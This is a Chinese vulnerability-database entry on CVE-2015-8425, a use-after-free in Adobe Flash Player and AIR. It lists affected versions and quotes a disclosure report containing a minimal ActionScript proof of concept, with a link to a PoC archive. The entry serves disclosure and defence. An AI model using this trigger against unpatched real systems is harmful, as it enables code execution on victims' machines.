多款Adobe产品释放后重用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123157 漏洞类型 其他
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 CVE-2015-8425 CNNVD-ID CNNVD-201512-255
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/39049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-255
|漏洞详情
AdobeFlashPlayer、AdobeAIRSDK和AdobeAIRSDK&Compiler都是美国奥多比(Adobe)公司的产品。AdobeFlashPlayer是一款多媒体播放器产品;AdobeAIRSDK和AdobeAIRSDK&Compiler都是适用于AdobeAIR(一个跨操作系统的运行时环境)的标准开发工具包。多款Adobe产品中存在释放后重用漏洞。攻击者可利用该漏洞执行任意代码,控制受影响系统。以下产品及版本受到影响:基于Windows和Macintosh平台的AdobeFlashPlayerDesktopRuntime19.0.0.245及之前版本和AdobeFlashPlayerExtendedSupportRelease18.0.0.261及之前版本,基于Windows、Macintosh、Linux和ChromeOS平台的AdobeFlashPlayerforGoogleChrome19.0.0.245及之前版本,基于Windows10平台的AdobeFlashPlayerforMicrosoftEdgeandInternetExplorer1119.0.0.245及之前版本,基于Windows8.0和8.1平台的AdobeFlashPlayerforInternetExplorer10and1119.0.0.245及之前版本,基于Linux平台的AdobeFlashPlayerforLinux11.2.202.548及之前版本,基于Windows和Macintosh平台的AIRDesktopRuntime19.0.0.241及之前版本,基于Windows、Macintosh、Android和iOS平台的AIRSDK19.0.0.241及之前版本和AIRSDK&Compiler19.0.0.241及之前版本,基于Android平台的AIRforAndroid19.0.0.241及之前版本。
|漏洞EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=583

If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100); 
trace(my_txt);
my_txt.variable = "today_date"; 
mc.today_date = "blah"; 
var times = 0;
 
var date_interval:Number = setInterval(updateDate, 500);
 
function updateDate() { 
    mc.today_date = {toString : func}; 
}

function func(){
	if(times == 0){
		times++;
		mc.removeMovieClip();
	}

	return "test";
	
	}

A sample fla and swf are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39049.zip
|参考资料

来源:helpx.adobe.com
链接:https://helpx.adobe.com/security/products/flash-player/apsb15-32.html